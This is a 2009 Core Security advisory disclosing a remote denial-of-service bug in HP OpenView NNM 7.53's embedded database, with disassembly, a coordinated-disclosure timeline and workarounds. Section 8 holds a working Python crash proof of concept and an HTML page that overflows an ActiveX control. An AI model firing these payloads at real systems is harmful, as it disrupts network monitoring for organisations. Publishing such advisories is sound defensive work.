Core Security Technologies Advisory 2009.0814

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Core Security Technologies - CoreLabs Advisory  
http://www.coresecurity.com/corelabs/  
  
HP Openview NNM 7.53 Invalid DB Error Code vulnerability  
  
  
  
1. *Advisory Information*  
  
Title: HP Openview NNM 7.53 Invalid DB Error Code vulnerability  
Advisory Id: CORE-2009-0814  
Advisory URL:  
http://www.coresecurity.com/content/openview_nnm_internaldb_dos  
Date published: 2009-11-17  
Date of last update: 2009-11-17  
Vendors contacted: HP  
Release mode: Coordinated release  
  
  
2. *Vulnerability Information*  
  
Class: External Initialization of Trusted Variables [CWE-454]  
Impact: Denial of Service  
Remotely Exploitable: Yes  
Locally Exploitable: No  
Bugtraq ID: N/A  
CVE Name: CVE-2009-3840  
  
  
3. *Vulnerability Description*  
  
HP Openview Network Node Manager is one of the most widely-deployed  
network monitoring and management platforms used throughout enterprise  
organizations today. The platform includes many server and client-side  
core components with a long list of previously disclosed security bugs.  
In this case, a remotely exploitable vulnerability was found in the  
database server core component used by NNM. Exploitation of the bug does  
not require authentication and will lead to a remotely triggered denial  
of service of the internal database service.  
  
  
4. *Vulnerable packages*  
  
. HP Openview NNM 7.53  
  
Other versions may be vulnerable but were not tested. Refer to the  
vendor's security bulletin for a full list.  
  
  
5. *Non-vulnerable packages*  
  
Refer to the vendor's security bulletin.  
  
  
6. *Vendor Information, Solutions and Workarounds*  
  
The vendor issued security bulletin HPSBMA02477 SSRT090177 to address  
the problem and provide fixes. It is available at  
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01926980  
  
The database service of HP Openview Network Node Manager is remotely  
accessible on port 2690/tcp. Restricting or blocking access to that port  
will prevent exploitation but may prevent normal operation of Openview NNM.  
  
  
7. *Credits*  
  
This vulnerability was discovered and researched by Damian Frizza from  
Core Security Technologies.  
  
  
8. *Technical Description / Proof of Concept Code*  
  
  
8.1. *HP Openview NNM 7.53 Embedded DB Remote Denial Of Service*  
  
HP Openview Network Node Manager includes an embedded database engine  
service that is enabled by default and accepts remote connections on  
port 2690/tcp. The service is implemented by the 'ovdbrun.exe' which is  
started automatically on boot. For certain transactions upon receiving a  
packet from the network the service will attempt to determine and  
display an error code string based on an error code number specified in  
the packet. By sending a specifically crafted packet with an invalid  
error code number it is possible to remotely trigger an exception that  
forces abnormal termination of the service. It is unlikely that the bug  
could be exploited for anything other than a remote denial of service.  
  
The following code excerpt explains the problem:  
  
/-----  
005FED51 MOVZX EDX,BYTE PTR SS:[ESP+2] #FCFF  
005FED56 MOVSX ECX,WORD PTR SS:[ESP+3]  
005FED5B CMP ECX,-1  
005FED5E MOVSX EAX,WORD PTR SS:[ESP+5] #FCFF  
005FED63 MOV DWORD PTR DS:[ESI+10],EDX  
005FED66 MOV EDX,DWORD PTR SS:[ESP+7]  
005FED6A MOV DWORD PTR DS:[ESI+14],ECX  
005FED6D MOV DWORD PTR DS:[ESI+18],EAX  
005FED70 MOV DWORD PTR DS:[ESI+C],EDX  
005FED73 JGE SHORT ovdbrun.005FED7E  
005FED75 CMP EAX,-1  
005FED78 JGE SHORT ovdbrun.005FED7E  
005FED7A CMP ECX,EAX  
005FED7C JE SHORT ovdbrun.005FED83  
005FED7E MOV EAX,1  
005FED83 ADD ESP,0C  
005FED86 RETN  
  
- -----/  
  
The code above checks for an error condition based on the value of an  
Error Code field in the inbound network packet. An error condition is  
explicitly handled if the Error Code value is less or equal than -1 in  
which case a MessageBox with a corresponding descriptive error string  
will be presented to the user. However by crafting a packet with any  
negative value in the Error Code field different that -1 the lookup for  
the corresponding error string will fail triggering a non-recoverable  
error and thus terminating the server process.  
  
The following python code can be used to reproduce the bug:  
  
/-----  
#!python  
import socket  
import struct  
  
a = struct.pack('<b', 2)  
a += struct.pack('<H', 0)  
a += struct.pack('<H',0xFEFF)  
a += struct.pack('<H',0xFEFF)  
a += "1234"  
  
target_ip = 'X.X.X.X'  
  
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)  
s.connect ((target_ip, 2690))  
  
s.send(a)  
s.close()  
  
- -----/  
  
  
  
8.2. *Additional information: Low severity bugs in ActiveDom.ocx ActiveX*  
  
The ActiveX control 'ActiveDom.ocx' is shipped with HP Openview NNM 7.53  
and installed by default. The control is prone to multiple memory  
corruption bugs due to erroneous handling of overly long strings passed  
to multiple methods. These bugs are considered of low severity because  
the control is not configured as Safe for Scripting or Safe for  
Initialization [1] and therefore cannot be exploited without explicit  
user consent. Since the control was reported by the vendor as not used  
nor required by any component of OpenView NNM, finding deployed systems  
with security configuration settings changed to allow exploitation of  
these bugs is very unlikely. Nonetheless information about them is  
included below for the purpose of completeness in the documentation of  
this advisory.  
  
Some of the ActiveX control's methods with implementation flaws are:  
  
/-----  
DisplayName(str)  
AddGroup(str)  
InstallComponent(str)  
Subscribe(str, str, int)  
  
- -----/  
  
The following excerpt from method DisplayName() demonstrates the problem:  
  
/-----  
2000D408 MOV DWORD PTR SS:[EBP-4],-1  
2000D40F JMP SHORT ACTIVE~1.2000D3D6  
2000D411 MOV EAX,ACTIVE~1.200361A0  
2000D416 JMP <JMP.&MSVCRT.__CxxFrameHandler>  
2000D41B MOV EAX,ACTIVE~1.2000D4A8  
2000D420 CALL <JMP.&MSVCRT._EH_prolog>  
2000D425 SUB ESP,10  
2000D428 PUSH EBX  
2000D429 PUSH ESI  
2000D42A PUSH EDI  
2000D42B MOV DWORD PTR SS:[EBP-10],ESP  
2000D42E MOV DWORD PTR SS:[EBP-14],ECX  
2000D431 XOR EBX,EBX  
2000D433 MOV DWORD PTR SS:[EBP-4],EBX  
2000D436 LEA ESI,DWORD PTR DS:[ECX+28]  
2000D439 MOV ECX,DWORD PTR DS:[ESI] ; ESI = 00038178  
2000D43B MOV EAX,DWORD PTR DS:[ECX] ;  
2000D43D CALL DWORD PTR DS:[EAX+48] ;  
  
- -----/  
  
The following HTML code can be used to trigger the bug:  
  
/-----  
<html>  
<object classid='clsid:A801FD2B-6FA8-11D0-BB85-00AA00A7EAAE' id='target'  
></object>  
<script>  
a = ""  
for (i = 0; i < 10000; i++)  
a = a + "A"  
target.DisplayName(a)  
</script>  
</html>  
  
  
- -----/  
  
  
  
9. *Report Timeline*  
  
. 2009-08-12:  
Core Security Technologies notifies the HP Software Security Response  
Team (SSRT) of the vulnerability and preliminary schedule to publish the  
corresponding security advisory on September 8th 2009. Core asks for  
acknowledgement of the email within 2 working days and whether HP SSRT  
prefers to receive the technical description of the bug encrypted or in  
plaintext.  
  
. 2009-08-12:  
HP SSRT asks Core to send the technical description of the vulnerability  
encrypted using the PGP key with id 0x08B83D45.  
  
. 2009-08-14:  
Core Security Technologies sends technical details encrypted to HP SSRT.  
  
. 2009-08-18:  
HP SSRT informs Core that HP engineering have been notified and will  
notify Core when they have a schedule estimate. SSRT assigned the IDs  
SSRT090177 and SSRT090178 to the vulnerabilities reported by Core.  
  
. 2009-08-27:  
Core requests a status update from HP SSRT.  
  
. 2009-08-27:  
HP SSRT informs Core that the vulnerabilities are in third-party code  
and that the third-party vendor has been notified but there isn't a  
schedule for fixes yet. HP SSRT indicates that it is sure HP will not  
have a solution ready by September 7th.  
  
. 2009-08-27:  
Core informs the HP team that the publication was re-scheduled to  
September 21st and requests an update to continue coordinating the  
release of fixes and publication of the advisory as soon as possible.  
  
. 2009-08-28:  
The HP team informs Core that the third party if planning a release on  
October 30th for the first vulnerability. SSRT also notes that ActiveX  
vulnerabilities are still being investigated.  
  
. 2009-08-31:  
Core Security Technologies acknowledges the information sent by HP SSRT.  
  
. 2009-09-01:  
The HP team communicates that they will inform Core Security  
Technologies when the fix is available.  
  
. 2009-09-04:  
Core asks the HP SSRT to map HP's internal IDs to each of the reported  
vulnerability.  
  
. 2009-09-04:  
The HP SSRT indicates that SSRT090177 corresponds to the embedded  
database vulnerability and SSRT090178 to the ActiveX bugs.  
  
. 2009-09-10:  
Core Security Technologies notifies HP SSRT that publication of the  
advisory has been re-scheduled to October 30th to be able to coordinate  
the release with the issuance of fixes by the third party vendor and  
that if non-third-party vulnerabilities (the ActiveX bugs) could be  
fixed earlier they would be described in a separate advisory.  
  
. 2009-09-11:  
HP SSRT says that it will send any new information to Core on the  
ActiveX bugs if they have something to publish before October 30th.  
  
. 2009-09-21:  
The HP team informs Core that they are having some problems reproducing  
the ActiveX vulnerabilities reported. The NNM engineers have used the  
provided proof-of-concept exploit but did not see any effect. SSRT asks  
if an overflow was confirmed, if process failure was detected and if a  
debugger or a different procedure was used.  
  
. 2009-09-21:  
Core Security Technologies notifies the HP SSRT that the proof of  
concept crash can be observed using a classic debugger or a just-in-time  
debugger that is attached only after an abnormal exception is detected.  
Core also sends HP SSRT another proof of concept HTML code that crashes  
the ActiveX and can be observed without the need of a debugger.  
  
. 2009-09-22:  
The HP team acknowledges previous email from Core with the new PoC to  
reproduce the crashes without a debugger.  
  
. 2009-10-06:  
Core requests a status update from the SSRT noting that it hasn't  
received any update since September 22nd. The advisory is still  
scheduled for publication on October 30th and Core is waiting for  
confirmation that the ActiveX bugs were reproduced and the fix for them  
could be published earlier separately.  
  
. 2009-10-09:  
SSRT updates indicating that fixes from the third party for SSRT090177  
have been received and HP is currently in the process of testing them on  
all platforms expecting an update by October 16th. The ActiveX bugs have  
been reproduced and HP determined that the vulnerable control is not  
necessary for NNM. HP will recommend customers to set the kill bit for  
the control (clsid:A801FD2B-6FA8-11D0-BB85-00AA00A7EAAE) as workaround.  
  
. 2009-10-19:  
Core requests a status update and confirmation that HP will be ready to  
release fixes by October 30th. Core asks if fixes will be issued for all  
vulnerable versions of NNM, whether the fixes or patches will remove the  
unnecessary ActiveX control or just ask customers to implement the  
workaround. Core requests the complete lists of vulnerable versions and  
platforms of NNM and asks if the patches will include fixes to other  
bugs. Also, Core notes that the vendor of the third party component has  
been identified and that since the bug may affect other products Core  
will start a separate vulnerability report process directly with that  
vendor.  
  
. 2009-11-02:  
Email from Core asking for a status update and an acknowledgement and  
response to the questions from the previous email. Core notes that the  
previously agreed publication date for the advisory has already passed  
without any update from HP. The publication date has been unilaterally  
moved to Wednesday November 4th. 2009 and is considered final pending a  
response from HP.  
  
. 2009-11-03:  
Response from HP SSRT stating that there is not an estimated release  
date for patches to some platforms. With regards to the ActiveX bugs, a  
security bulletin will be published on November 9th recommending setting  
the kill bit.  
  
. 2009-11-03:  
Core indicates that since there isn't an estimated patch release date  
for missing platforms the advisory will be published on November 9th and  
will include guidance on how to implement workarounds for both problems.  
Core asks SSRT about the potential impact of blocking or restricting  
access to the vulnerable service as a workaround.  
  
. 2009-11-05:  
SSRT suggests that given that Core advisory will be published earlier  
than HP's security bulletin it should have workarounds for all platforms  
and not just for the ones that may not have a patch available  
afterwards. HP is still investigating the impact of blocking or  
restricting access to the vulnerable port. SSRT asks if Core wants any  
acknowledgement in its security bulletin  
  
. 2009-11-05:  
Core asks what is the planned publication date for HP's bulletin and  
requests that the bulletin credits the discoverer (Damian Frizza).  
Provided that the estimated date for publishing the bulletin is not  
unreasonable Core would rather schedule the publication of the advisory  
to match HP's.  
  
. 2009-11-06:  
SSRT informs that their estimate is to have hotfixes available  
internally by November 13th and released along with the corresponding  
security bulletins by November 17th. SSRT ask whether CVE numbers should  
be assigned by HP or provided by Core.  
  
. 2009-11-06:  
Core re-schedules publication to November 17th. Core asks SSRT to assign  
the CVE numbers.  
  
. 2009-11-12:  
HP SSRT reports that the ActiveX control is not marked as safe for  
scripting or safe for initialization by default and thus the buffer  
overflows in its methods do not seem to be security issues. Asks if Core  
still considers them security vulnerabilities.  
  
. 2009-11-16:  
HP SSRT provides the CVE id assigned to the denial of service bug.  
Indicates that the vendor's security bulletin will not suggest any  
workarounds as the effect of blocking or restricting access to the  
vulnerable service has not been determined.  
  
. 2009-11-16:  
Core confirms that the ActiveX control is not marked as safe for  
scripting or initialization which greatly diminishes the relevance of  
the reported bugs. Nonetheless, the information about the bugs will be  
included in the advisory for the purpose of completeness and to let  
users verify, and if necessary correct, the control's configuration  
settings. Core still recommends the vendor to remove the unnecessary  
control from installation packages and fix the reported bugs to avoid  
potential introduction of flaws if it becomes a used control in the  
future or should an alternative exploitation vector be found.  
  
. 2009-11-17:  
Publication of HP Security Bulletin SSRT090177.  
  
. 2009-11-17:  
Advisory CORE-2009-0814 published.  
  
  
  
10. *References*  
  
[1] Safe Initialization and Scripting for ActiveX Controls.  
http://msdn.microsoft.com/en-us/library/aa751977(VS.85).aspx  
[2] How to stop an ActiveX control from running in Internet Explorer.  
http://support.microsoft.com/kb/240797  
  
  
11. *About CoreLabs*  
  
CoreLabs, the research center of Core Security Technologies, is charged  
with anticipating the future needs and requirements for information  
security technologies. We conduct our research in several important  
areas of computer security including system vulnerabilities, cyber  
attack planning and simulation, source code auditing, and cryptography.  
Our results include problem formalization, identification of  
vulnerabilities, novel solutions and prototypes for new technologies.  
CoreLabs regularly publishes security advisories, technical papers,  
project information and shared software tools for public use at:  
http://www.coresecurity.com/corelabs.  
  
  
12. *About Core Security Technologies*  
  
Core Security Technologies develops strategic solutions that help  
security-conscious organizations worldwide develop and maintain a  
proactive process for securing their networks. The company's flagship  
product, CORE IMPACT, is the most comprehensive product for performing  
enterprise security assurance testing. CORE IMPACT evaluates network,  
endpoint and end-user vulnerabilities and identifies what resources are  
exposed. It enables organizations to determine if current security  
investments are detecting and preventing attacks. Core Security  
Technologies augments its leading technology solution with world-class  
security consulting services, including penetration testing and software  
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core  
Security Technologies can be reached at 617-399-6980 or on the Web at  
http://www.coresecurity.com.  
  
  
13. *Disclaimer*  
  
The contents of this advisory are copyright (c) 2009 Core Security  
Technologies and (c) 2009 CoreLabs, and may be distributed freely  
provided that no fee is charged for this distribution and proper credit  
is given.  
  
  
14. *PGP/GPG Keys*  
  
This advisory has been signed with the GPG key of Core Security  
Technologies advisories team, which is available for download at  
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.8 (MingW32)  
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/  
  
iEYEARECAAYFAksDICYACgkQyNibggitWa2//ACdFpN6SK4B59Iza5Nq88oASfat  
YhoAn24UcNlJ/lpKv4brl4d6mctKfwMF  
=cR49  
-----END PGP SIGNATURE-----  
`